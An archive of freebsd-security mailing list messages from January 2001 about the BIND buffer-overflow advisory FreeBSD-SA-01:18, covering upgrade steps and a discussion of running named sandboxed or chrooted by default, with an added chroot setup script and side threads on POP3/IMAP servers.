See the named.conf(5) manual page for more details about configuring named.

Perform the following commands as root:

Create a directory writable by the bind user where named can store its
pid file:

# mkdir /var/named
# chown bind:bind /var/named

Shut down the DNS server:

# ndc stop

Restart it using the non-privileged user and group:

# ndc -p /var/named/named.pid start -u bind -g bind

Note that when not running as the root user, named will lose the ability
to re-bind to interfaces which change address, or which are added to the
system after named has been started. If such an event takes place, named
will need to be stopped and restarted in order to re-bind to the
interface(s). See the ndc(8) manual page for more information about how
to do this.

Use of the -t option to named will also increase security when run as a
non-privileged user by confining the named process to a chroot environment
and thereby partially limiting the access it has to the rest of the system.
Configuration of these options is beyond the scope of the advisory.
The following website contains information which may be useful to
administrators wishing to perform this step:

http://www.losurs.org/docs/howto/Chroot-BIND.html

Note that this tutorial does not specifically relate to FreeBSD, and the
information contained therein may need to be modified for FreeBSD
systems.

Note that a successful penetration of the unprivileged bind user may
still allow the attacker to take advantage of a local security
vulnerability or misconfiguration to further increase privileges.
Therefore this should only be considered a temporary workaround while
preparations can be made to upgrade permanently. It is recommended that
all affected users upgrade their systems immediately as described in the
following section.

V. Solution

Note that BIND 8.2.3-RELEASE is more strict about invalid zone file
syntax than older versions. DNS zones which contain errors may need to
be corrected before the new version can be run.

[Base system]

Upgrade your vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE after
the respective correction dates.

A binary tarball containing the updated BIND files may be released in a
few days, but is being held back for quality assurance reasons. In the
meantime an unofficial tarball is available from the following location.
Users are advised that the following tarball has not been tested on a
production system, and those wishing to perform an upgrade without
upgrading the entire OS are advised to use the bind8 port as described
below.

http://www.freebsd.org/~kris/bind-8.2.3-4.x.tgz
http://www.freebsd.org/~kris/bind-8.2.3-4.x.tgz.asc

To fetch and install it, perform the following actions as root:

# fetch http://www.freebsd.org/~kris/bind-8.2.3-4.x.tgz
# fetch http://www.freebsd.org/~kris/bind-8.2.3-4.x.tgz.asc

Verify the detached PGP signature using your PGP utility.
# cd /
# tar xvfz /path/to/bind-8.2.3-4.x.tgz

Stop and restart the named process as shown:

# ndc restart

See the note in the previous section about how to restart named with
ndc as a non-privileged user if it has been configured to run that way.

[Ports collection]

If you have chosen to install BIND from the ports collection and are
using it instead of the version in the base system, perform one of the
following steps:

1) Update your entire ports collection and rebuild the bind8 port.

If you are installing the port for the first time, be sure to edit the
named_program variable in /etc/rc.conf to point to the installed
location of the named executable.

The bind8 port can be configured to install itself in /usr and read
configuration data from /etc so that it is drop-in compatible with the
system version of BIND. Install the port as follows:

# cd /usr/ports/net/bind8
# make PREFIX=/usr PIDDIR=/var/run DESTETC=/etc/namedb \
    DESTRUN=/var/run all install clean

If you install the BIND port over the top of the system version in this
way, be sure to add the following line to /etc/make.conf to prevent the
future rebuilding of the system version during 'make world':

NO_BIND=        true    # do not build BIND

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/net/bind-8.2.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/net/bind-8.2.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/net/bind-8.2.3.tgz

NOTE: It may be several days before updated packages are available.

[alpha]
Packages are not automatically generated for the alpha architecture at
this time due to lack of build resources.

3) Download a new port skeleton for the bind8 port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above.
The portcheckout port is available in /usr/ports/devel/portcheckout or
the package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOniArlUuHi5z0oilAQGE+AQAiwizuORMqyzOw21QFyap2Z7lv7BkYuiC
9zZ97X3WR+i8AujTfIrhwK1UdO6KFbp5Rjc54f3XHtaMotoRcp3x24xADpGQDP4s
Xyw267ZoV7ZYuG6VcAgBzq9pqiCnU9rqRQy2aRn/8iCvcl/G5249B3DuMMtLiMw+
Iuz0OOxWeLM=
=hanM
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Jan 31 13:56:19 2001
From: Roman Shterenzon
Date: Wed, 31 Jan 2001 23:55:18 +0200 (IST)
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
In-Reply-To: <200101312123.f0VLNL134920@freefall.freebsd.org>

On Wed, 31 Jan 2001, FreeBSD Security Advisories wrote:

> =============================================================================
> FreeBSD-SA-01:18 Security Advisory
>
> Topic: BIND
> remotely exploitable buffer overflow
..snip..
>
> There is no known practical workaround to prevent the vulnerability
> from being exploited, short of upgrading the software. A partial
> workaround to limit the impact of the vulnerability should it be
> exploited is to run named as an unprivileged user.
>
> Add the following line to /etc/rc.conf:
>
> named_flags="-u bind -g bind"   # Flags for named
>
> Add the following line to your /etc/namedb/named.conf file, in the
> "options" section:
>
> pid-file "/var/named/named.pid";
>
> See the named.conf(5) manual page for more details about configuring
> named.
>
> Perform the following commands as root:
>
> Create a directory writable by the bind user where named can store its
> pid file:
>
> # mkdir /var/named
> # chown bind:bind /var/named
>
> Use of the -t option to named will also increase security when run as
> a non-privileged user by confining the named process to a chroot
> environment and thereby partially limiting the access it has to the
> rest of the system. Configuration of these options is beyond the
> scope of the advisory. The following website contains information
> which may be useful to administrators wishing to perform this step:
>
> http://www.losurs.org/docs/howto/Chroot-BIND.html
>

Why not make it default in the base system?

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel.
Tel: +972-9-9522361 ]

From owner-freebsd-security Wed Jan 31 14:00:39 2001
From: Roelof Osinga
Organization: Nisser - Nr. 1 in Veiligheid
Date: Wed, 31 Jan 2001 22:59:48 +0100
To: Wes Peters
Cc: "Edward W. M.", freebsd-security@FreeBSD.ORG
Subject: Re: POP3 / IMAP security
Message-ID: <3A788AD4.B33A19B9@nisser.com>
References: <3A7708AC.8B490984@softweyr.com>

Wes Peters wrote:
>
> > ...
> > knowledge and experience.
>
> Courier. It's GPL, but it seems reliable. I'm learning quite a bit
> more about it right now, working on an authentication module to work
> with our user database (stored in PostgreSQL). Courier works well
> with either BSD-style mailboxes or Maildirs. We use it in conjunction
> with Qmail, though I am experimenting with Cyrus and Postfix as well.

Yeah, it's cool enough all right. But it's also new and not all-there
yet. When things don't work you're SOL. When you want to leave the
beaten path, ditto. I'm booting it up in combination with postfix and
virtual users in the uber-user's Maildir. It can be done, but...

Same goes for the SSL, almost no problems. Still, it has a clean slate
compared to WU and feels good. Also it is quite security conscious,
which is always nice.
But it is still young and I've yet to see a 'HOWTO' but for the INSTALL
file. There's a dearth of information that almost entices one to look
into the source.

Roelof
--
Home is where the (@) http://eboa.com/ is.
Nisser home -- http://www.Nisser.com/

From owner-freebsd-security Wed Jan 31 14:05:15 2001
From: Alfred Perlstein
Date: Wed, 31 Jan 2001 14:04:47 -0800
To: Roman Shterenzon
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Message-ID: <20010131140447.E26076@fw.wintelcom.net>
References: <200101312123.f0VLNL134920@freefall.freebsd.org>

* Roman Shterenzon [010131 13:56] wrote:
> On Wed, 31 Jan 2001, FreeBSD Security Advisories wrote:
>
> > =============================================================================
> > FreeBSD-SA-01:18 Security Advisory
> >
> > Topic: BIND remotely exploitable buffer overflow
> ..snip..
>
> Why not make it default in the base system?

It has been, but only for several days.

--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
"I have the heart of a child; I keep it in a jar on my desk."
From owner-freebsd-security Wed Jan 31 14:14:31 2001
From: "Edward W. M."
Date: Wed, 31 Jan 2001 14:14:10 -0800
To: wes@softweyr.com
Cc: freebsd-security@FreeBSD.ORG, kris@obsecurity.org
Subject: Re: POP3 / IMAP security

On Tue, 30 Jan 2001 11:32:12 -0700, Wes Peters wrote:

>Courier. It's GPL, but it seems reliable. I'm learning quite a bit
>more about it right now, working on an authentication module to work
>with our user database (stored in PostgreSQL). Courier works well
>with either BSD-style mailboxes or Maildirs. We use it in
>conjunction with Qmail, though I am experimenting with Cyrus and
>Postfix as well.

It looks good, but let me quote the first part of
ports/mail/courier-imap/pkg-descr:

  Courier-IMAP is a server that provides IMAP access to Maildir
  mailboxes. This IMAP server does NOT handle traditional mailbox
  files (/var/spool/mail, and derivatives), it was written for the
  specific purpose of providing IMAP access to Maildirs.

So it does not support the mailbox format (which I need); you must have
misread something. Thanks for trying to help though.

As I have not received many responses I was forced to do some research
myself.
I would like to thank all of you who responded, most of you recommended
ports/mail/cucipop, which seems to be a fast, fully RFC 1939 compliant
POP3 server. It works well as long as you are not accessing the mailbox
from your mail reader and via pop simultaneously, which some of my users
are bound to do.

So far the best choices for POP3 seem to be:

- ports/mail/popa3d, a server written by Solar Designer, which means
  that security was a top priority in designing this piece of software.
  Only the mailbox format is supported, sounds like a very good choice.

- ports/mail/solidpop3d, claims to have a very similar design to
  popa3d's, but with flexibility as its main goal. It supports both
  mailbox and maildir formats and has all sorts of very nice features
  that you should read about in its pkg-descr. One of the features I
  find very useful is user mapping, which, as far as I understand, can
  also be used to deny certain users access to their mail via pop. All
  you have to do is set configuration options DoMapping and
  RequiredMapping to true and all users who are NOT listed in the file
  specified under UserMapFile will not be allowed access to their mail.
  So it has the exact opposite function as ftpusers for ftp.

Does anyone know of a pop server with this sort of functionality that
can be used directly (i.e. through a pop3users file)?

I have not had the time to find the next best thing to Cyrus as far as
imap servers are concerned, but when I do, I will post my findings here
- if anyone's interested, that is.

Kris (I know you were wondering why I sent you a CC :-)), since I
mentioned ftp, could you tell us what kind of server you are running at
ftp.freebsd.org? I get:

220 sourcerer.freesoftware.com FTP server (Version DG-4.0.62974200128) ready.

What is this and where can I grab a copy? I'm currently using proftpd
and am quite happy with it, but I would be very interested in taking a
look at what makes one of the world's busiest ftp sites tick.

Thanks,
Edward W. M.
From owner-freebsd-security Wed Jan 31 14:23:13 2001
From: Sam Wun
Organization: eSec Limited
Date: Thu, 01 Feb 2001 09:28:39 +1100
Cc: freebsd-security@FreeBSD.ORG
Subject: packets in ipmon
Message-ID: <3A789196.B9771209@esec.com.au>
References: <00c901c08a66$5f1ce3c0$0101a8c0@pavilion>

Hi,

I am wondering which part of the ipmon output message indicates the
number of packets that have been blocked?
for example:

Feb  1 09:25:14 swun ipmon[55]: 09:25:14.540972 dc0 @0:18 b 203.21.85.29,631 -> 203.21.85.255,631 PR udp len 20 34816 IN

Thanks
Sam

From owner-freebsd-security Wed Jan 31 14:47:55 2001
From: Brian Behlendorf
Date: Wed, 31 Jan 2001 14:48:13 -0800 (PST)
To: Alfred Perlstein
Cc: Roman Shterenzon
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
In-Reply-To: <20010131140447.E26076@fw.wintelcom.net>

On Wed, 31 Jan 2001, Alfred Perlstein wrote:
> * Roman Shterenzon [010131 13:56] wrote:
> > On Wed, 31 Jan 2001, FreeBSD Security Advisories wrote:
> >
> > > =============================================================================
> > > FreeBSD-SA-01:18 Security Advisory
> > >
> > > Topic: BIND remotely exploitable buffer overflow
> > ..snip..
> >
> > Why not make it default in the base system?
>
> It has been, but only for several days.

I think he meant, why not set those recommendations for running as user
"bind" and in a chroot jail as the default?
Unless I'm missing something, that's not the case currently:

[yez] 2:47pm ~ > fgrep -i named_flag /etc/defaults/rc.conf
named_flags=""                  # Flags for named
#named_flags="-u bind -g bind"  # Flags for named

	Brian

From owner-freebsd-security Wed Jan 31 14:54:50 2001
From: Alfred Perlstein
Date: Wed, 31 Jan 2001 14:54:23 -0800
To: Brian Behlendorf
Cc: Roman Shterenzon, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Message-ID: <20010131145423.H26076@fw.wintelcom.net>
References: <20010131140447.E26076@fw.wintelcom.net>

* Brian Behlendorf [010131 14:47] wrote:
> On Wed, 31 Jan 2001, Alfred Perlstein wrote:
> > * Roman Shterenzon [010131 13:56] wrote:
> > > On Wed, 31 Jan 2001, FreeBSD Security Advisories wrote:
> > >
> > > > =============================================================================
> > > > FreeBSD-SA-01:18 Security Advisory
> > > >
> > > > Topic: BIND remotely exploitable buffer overflow
> > > ..snip..
> > >
> > > Why not make it default in the base system?
> >
> > It has been, but only for several days.
>
> I think he meant, why not set those recommendations for running as user
> "bind" and in a chroot jail as the default?
> Unless I'm missing something,
> that's not the case currently:
>
> [yez] 2:47pm ~ > fgrep -i named_flag /etc/defaults/rc.conf
> named_flags=""                  # Flags for named
> #named_flags="-u bind -g bind"  # Flags for named

Since named supports a command line option for chroot as well as user
flags (-t) it would be trivial to have it the default.

It's pretty much a toss-up between usability and security.

I guess this is the final blow for me, and I think we should run bind in
a sandbox at this point, I'm just worried about confusing newbies who
wish to set it up.

If anyone has a proposal on doing it by default that doesn't impact ease
of use (or if already doesn't impact it) then I'm for it.

What I'm worrying about specifically is ndc and other utilities
basically are unix domain sockets not in the expected place all of
sudden?

--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
"I have the heart of a child; I keep it in a jar on my desk."

From owner-freebsd-security Wed Jan 31 15:06:24 2001
From: Matt Dillon
Date: Wed, 31 Jan 2001 15:05:57 -0800 (PST)
To: Alfred Perlstein
Cc: Brian Behlendorf, Roman Shterenzon, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Message-Id: <200101312305.f0VN5vJ19469@earth.backplane.com>
References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net>

:> [yez] 2:47pm ~ > fgrep -i named_flag
/etc/defaults/rc.conf
:> named_flags=""                  # Flags for named
:> #named_flags="-u bind -g bind"  # Flags for named
:
:Since named supports a command line option for chroot as well
:as user flags (-t) it would be trivial to have it the default.
:
:It's pretty much a toss-up between usability and security.
:
:I guess this is the final blow for me, and I think we should
:run bind in a sandbox at this point, I'm just worried about
:confusing newbies who wish to set it up.
:
:If anyone has a proposal on doing it by default that doesn't
:impact ease of use (or if already doesn't impact it) then I'm
:for it.
:
:What I'm worrying about specifically is ndc and other utilities
:basically are unix domain sockets not in the expected place all of
:sudden?
:
:--
:-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
:"I have the heart of a child; I keep it in a jar on my desk."

Quite a few people have been using the sandbox options in the last year
without any ill effects (I was the original author of the feature). The
only issue is that you cannot HUP named (it will not be able to rebind
its sockets), you can only restart it, and you have to supply the proper
options to ndc when restarting it (-u bind -g bind). I usually restart
it anyway (I don't trust the named HUP code).

I think we can easily make it the default.

By the way, I seem to recall someone posting some chown's/chmod's for
/etc/namedb to run it in a sandbox that were wrong. *ALL* files in
/etc/namedb except the 's/' subdirectory should be root.wheel, modes
644. The 's/' subdirectory should be user bind, group bind, modes 775.
The only directory named needs to write to is /etc/namedb/s (for
secondaries) and /var/run (for the pid file).

Using named's chrooting option is a more drastic approach, but also
doable as a default IFF we compile named and named-xfer statically by
default. Neither this mode of operation nor the jail mode has been
widely tested. The sandbox options have been tested widely.
					-Matt

From owner-freebsd-security Wed Jan 31 15:16:04 2001
From: Alfred Perlstein
Date: Wed, 31 Jan 2001 15:15:31 -0800
To: Matt Dillon
Cc: Brian Behlendorf, Roman Shterenzon, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Message-ID: <20010131151531.I26076@fw.wintelcom.net>
References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net> <200101312305.f0VN5vJ19469@earth.backplane.com>

* Matt Dillon [010131 15:06] wrote:
> :> [yez] 2:47pm ~ > fgrep -i named_flag /etc/defaults/rc.conf
> :> named_flags=""                  # Flags for named
> :> #named_flags="-u bind -g bind"  # Flags for named
> :
> :Since named supports a command line option for chroot as well
> :as user flags (-t) it would be trivial to have it the default.
> :
> :It's pretty much a toss-up between usability and security.
> :
> :I guess this is the final blow for me, and I think we should
> :run bind in a sandbox at this point, I'm just worried about
> :confusing newbies who wish to set it up.
> :
> :If anyone has a proposal on doing it by default that doesn't
> :impact ease of use (or if already doesn't impact it) then I'm
> :for it.
> :
> :What I'm worrying about specifically is ndc and other utilities
> :basically are unix domain sockets not in the expected place all of
> :sudden?
> :
> :--
> :-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
> :"I have the heart of a child; I keep it in a jar on my desk."
>
> Quite a few people have been using the sandbox options in the
> last year without any ill effects (I was the original author of
> the feature). The only issue is that you cannot HUP named (it will
> not be able to rebind its sockets), you can only restart it, and
> you have to supply the proper options to ndc when restarting it
> (-u bind -g bind). I usually restart it anyway (I don't trust the
> named HUP code).
>
> I think we can easily make it the default.

If it breaks HUP, then not really. :)

I'm not sure how bind handles restarts, but even if it exec(2)s over
itself it can track the fd open for its socket and shouldn't have to
rebind it.

> By the way, I seem to recall someone posting some chown's/chmod's
> for /etc/namedb to run it in a sandbox that were wrong. *ALL*
> files in /etc/namedb except the 's/' subdirectory should be root.wheel,
> modes 644. The 's/' subdirectory should be user bind, group bind,
> modes 775. The only directory named needs to write to is
> /etc/namedb/s (for secondaries) and /var/run (for the pid file).

Makes sense, it almost makes sense to make /var/run/named.pid a symlink
into /etc/named/named.pid.

> Using named's chrooting option is a more drastic approach, but also
> doable as a default IFF we compile named and named-xfer statically
> by default. Neither this mode of operation nor the jail mode has
> been widely tested. The sandbox options have been tested widely.

A shell script could copy the required shared libs into the chroot tree.

--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
"I have the heart of a child; I keep it in a jar on my desk."
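The two pieces of setup discussed in this exchange (the shell script Alfred suggests for copying named and its shared libraries into a chroot tree for the advisory's -t option, and the /etc/namedb ownership and mode rules Matt gives) as one added example script. It is not code from the advisory, from either poster, or from the FreeBSD base system. It assumes the FreeBSD 4.x paths /usr/sbin/named and /usr/libexec/named-xfer and a chroot root of /var/named; the root, user, group and paths are all parameters so the functions can be exercised on a scratch directory as an unprivileged user.

```sh
#!/bin/sh
# Added example, not from the advisory or the thread: build a chroot tree
# for named and apply the /etc/namedb ownership and mode rules from the
# discussion. The paths in the usage comment at the bottom are assumed
# FreeBSD 4.x locations.

# copy_with_libs ROOT BINARY
# Copy BINARY into ROOT at the same path, then every shared object and
# the dynamic loader that ldd(1) reports for it. A static binary, or a
# system without ldd, just gets the binary copied.
copy_with_libs() {
    root=$1
    bin=$2
    mkdir -p "$root$(dirname "$bin")" || return 1
    cp "$bin" "$root$bin" || return 1
    command -v ldd >/dev/null 2>&1 || return 0
    # ldd prints "libc.so.4 => /usr/lib/libc.so.4 (0x...)" or a bare
    # "/usr/libexec/ld-elf.so.1 (0x...)"; keep only the fields that are paths.
    ldd "$bin" 2>/dev/null |
    awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^\//) print $i }' |
    while read -r lib; do
        [ -f "$lib" ] || continue
        mkdir -p "$root$(dirname "$lib")" || exit 1
        cp "$lib" "$root$lib" || exit 1
    done
}

# set_namedb_perms NAMEDB ROOTOWNER BINDOWNER
# Matt's rules: everything under NAMEDB belongs to ROOTOWNER (root:wheel
# on the real system) with files mode 644; only NAMEDB/s, where secondary
# zones are written, belongs to the bind user (BINDOWNER) and is 775.
# Directories other than s/ get 755: "644 for files" cannot apply to a
# directory, which needs the x bit to be traversed (my reading, not his).
set_namedb_perms() {
    namedb=$1
    rootowner=$2
    bindowner=$3
    mkdir -p "$namedb/s" || return 1
    chown -R "$rootowner" "$namedb" || return 1
    find "$namedb" -path "$namedb/s" -prune -o -type f -exec chmod 644 {} + || return 1
    find "$namedb" -path "$namedb/s" -prune -o -type d -exec chmod 755 {} + || return 1
    chown "$bindowner" "$namedb/s" || return 1
    chmod 775 "$namedb/s"
}

# mode_of PATH: octal permission bits, trying GNU stat first, then BSD stat.
mode_of() {
    stat -c %a "$1" 2>/dev/null || stat -f %Lp "$1"
}

# On the real system, as root (assumed paths):
#   copy_with_libs /var/named /usr/sbin/named
#   copy_with_libs /var/named /usr/libexec/named-xfer
#   set_namedb_perms /var/named/etc/namedb root:wheel bind:bind
# then start it with the advisory's flags plus -t:
#   named -u bind -g bind -t /var/named
```

Once named is started with -t it resolves every path, including the one to named.conf and the pid-file and directory options inside it, relative to the new root, so the namedb tree has to live under /var/named (the third call above) rather than in /etc/namedb. ldd is only consulted for the binary you name; if named-xfer or named itself is later replaced by the upgrade, rerun copy_with_libs so the chroot does not keep serving the old, vulnerable copy.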
From owner-freebsd-security Wed Jan 31 15:24:47 2001
From: Brian
Date: Wed, 31 Jan 2001 15:25:18 -0800 (PST)
To: Alfred Perlstein
Cc: Roman Shterenzon, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
In-Reply-To: <20010131140447.E26076@fw.wintelcom.net>

I downloaded ports this am, and it was not the default at that point,
on cvsup10.

Bri

On Wed, 31 Jan 2001, Alfred Perlstein wrote:

> * Roman Shterenzon [010131 13:56] wrote:
> > On Wed, 31 Jan 2001, FreeBSD Security Advisories wrote:
> >
> > > =============================================================================
> > > FreeBSD-SA-01:18 Security Advisory
> > >
> > > Topic: BIND remotely exploitable buffer overflow
> > ..snip..
> >
> > Why not make it default in the base system?
>
> It has been, but only for several days.
>
> --
> -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
> "I have the heart of a child; I keep it in a jar on my desk."
From owner-freebsd-security Wed Jan 31 15:26:03 2001
From: David Wolfskill
Date: Wed, 31 Jan 2001 15:25:20 -0800 (PST)
To: freebsd-security@freebsd.org
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Message-Id: <200101312325.f0VNPKS00324@pau-amma.whistle.com>
In-Reply-To: <20010131151531.I26076@fw.wintelcom.net>

>Date: Wed, 31 Jan 2001 15:15:31 -0800
>From: Alfred Perlstein

>> Quite a few people have been using the sandbox options in the
>> last year without any ill effects (I was the original author of
>> the feature). The only issue is that you cannot HUP named (it will
>> not be able to rebind its sockets), you can only restart it, and
>> you have to supply the proper options to ndc when restarting it
>> (-u bind -g bind). I usually restart it anyway (I don't trust the
>> named HUP code).

>> I think we can easily make it the default.

>If it breaks HUP, then not really. :)

janus# ps -axwwl|grep named
   53 21965     1   0   2  0  2352 1176 select  Is    ??
0:09.82 /usr/sbin/named -u bind -g bind
    0 25313   289   2  -6  0   944  472 piperd  S+    p0    0:00.01 grep named
janus# ndc reload
Reload initiated.
janus# uname -a
FreeBSD janus.catwhisker.org 3.2-RELEASE FreeBSD 3.2-RELEASE #0: Wed Jan 24 07:08:56 PST 2001     root@bunrab.catwhisker.org:/usr/src/sys/compile/JANUS  i386
janus#

(Note that uid "53" is that of "bind", not "root".)

Meanwhile, in /var/log/messages:

Jan 31 15:19:52 janus named[21965]: reloading nameserver
Jan 31 15:19:52 janus named[21965]: Ready to answer queries.

The other thing I did:

janus# ls -ld /var/run
drwxrwxrwt  2 root  wheel  512 Jan 31 15:19 /var/run
janus# !!/named*
ls -ld /var/run/named*
-rw-r--r--  1 bind  bind  6 Jan 31 15:19 /var/run/named.pid
janus#

(The machine does not have "general logins" at all.)

>I'm not sure how bind handles restarts, but even if it exec(2)s over
>itself it can track the fd open for its socket and shouldn't have to
>rebind it.

Seems to work for me. Note I'm not trying to use the chroot()
environment, nor a jail; just a little sandbox.

(Oh, yeah: I set up /var/named as the directory for BIND to play with,
because I have / & /usr mounted read-only.)
Cheers,
david
-- 
David Wolfskill dhw@whistle.com UNIX System Administrator
Desk: 650/577-7158 TIE: 8/499-7158 Cell: 650/759-0823

From owner-freebsd-security Wed Jan 31 15:26:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id ED2D837B65D for ; Wed, 31 Jan 2001 15:26:21 -0800 (PST)
Received: (qmail 769 invoked by uid 1000); 31 Jan 2001 23:26:19 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 31 Jan 2001 23:26:19 -0000
Date: Wed, 31 Jan 2001 17:26:19 -0600 (CST)
From: Mike Silbersack
To: Alfred Perlstein
Cc: Matt Dillon , Brian Behlendorf , Roman Shterenzon ,
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
In-Reply-To: <20010131151531.I26076@fw.wintelcom.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 31 Jan 2001, Alfred Perlstein wrote:

> If it breaks HUP, then not really. :)
>
> I'm not sure how bind handles restarts, but even if it exec(2)s over
> itself it can track the fd open for its socket and shouldn't have to
> rebind it.

I don't see any complaints from 8.2.3 running -u bind -g bind when I HUP it here.

(Well, ok, I see the can't create pidfile junk, but that's not critical IMHO.)
Mike "Silby" Silbersack

From owner-freebsd-security Wed Jan 31 15:27:47 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id CDCB237B491 for ; Wed, 31 Jan 2001 15:27:30 -0800 (PST)
Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f0VNRPv20077; Wed, 31 Jan 2001 15:27:25 -0800 (PST) (envelope-from dillon)
Date: Wed, 31 Jan 2001 15:27:25 -0800 (PST)
From: Matt Dillon
Message-Id: <200101312327.f0VNRPv20077@earth.backplane.com>
To: Alfred Perlstein
Cc: Brian Behlendorf , Roman Shterenzon , freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net> <200101312305.f0VN5vJ19469@earth.backplane.com> <20010131151531.I26076@fw.wintelcom.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

:> I think we can easily make it the default.
:
:If it breaks HUP, then not really. :)
:
:I'm not sure how bind handles restarts, but even if it exec(2)s over
:itself it can track the fd open for its socket and shouldn't have to
:rebind it.

    You gotta work with what you have. Bind outsmarts itself in a lot of places, especially the stupid interface scanning/binding code. The last thing I want it to do is hold *any* state from the previous incarnation across a restart. Frankly, restarting is not a big deal even if you have hundreds or thousands of domains. I always restarted named at BEST rather than HUP it, because HUPing is simply too dangerous when you make random modifications to dozens of primary zone files out of thousands.

    ndc kill's the original bind and starts a new one as root when you use 'ndc restart'.
-Matt

From owner-freebsd-security Wed Jan 31 15:36:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (Postfix) with ESMTP id AC05D37B4EC for ; Wed, 31 Jan 2001 15:36:12 -0800 (PST)
Received: (from smap@localhost) by whistle.com (8.10.0/8.10.0) id f0VNaCw06510 for ; Wed, 31 Jan 2001 15:36:12 -0800 (PST)
Received: from pau-amma.whistle.com( 207.76.205.64) by whistle.com via smap (V2.0) id xma006507; Wed, 31 Jan 2001 15:35:54 -0800
Received: (from dhw@localhost) by pau-amma.whistle.com (8.11.1/8.11.1) id f0VNZrk00415 for freebsd-security@FreeBSD.ORG; Wed, 31 Jan 2001 15:35:53 -0800 (PST)
Date: Wed, 31 Jan 2001 15:35:53 -0800 (PST)
From: David Wolfskill
Message-Id: <200101312335.f0VNZrk00415@pau-amma.whistle.com>
To: freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
In-Reply-To: <200101312327.f0VNRPv20077@earth.backplane.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>Date: Wed, 31 Jan 2001 15:27:25 -0800 (PST)
>From: Matt Dillon

> ndc kill's the original bind and starts a new one as root when you use
> 'ndc restart'.

So don't do that -- quite. Use "ndc restart -u bind -g bind" instead. (Granted, that's more keystrokes to remember & get wrong.... Maybe if named.pid were structured like sendmail.pid, that would provide a way to automate the process a little better.)
Cheers,
david
-- 
David Wolfskill dhw@whistle.com UNIX System Administrator
Desk: 650/577-7158 TIE: 8/499-7158 Cell: 650/759-0823

From owner-freebsd-security Wed Jan 31 15:39:05 2001
Delivered-To: freebsd-security@freebsd.org
Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id EC12537B491 for ; Wed, 31 Jan 2001 15:38:45 -0800 (PST)
Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 14O6pE-0002Po-00 for freebsd-security@freebsd.org; Thu, 01 Feb 2001 01:38:08 +0200
Date: Thu, 1 Feb 2001 01:38:08 +0200 (IST)
From: Roman Shterenzon
To:
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
In-Reply-To: <20010131145423.H26076@fw.wintelcom.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
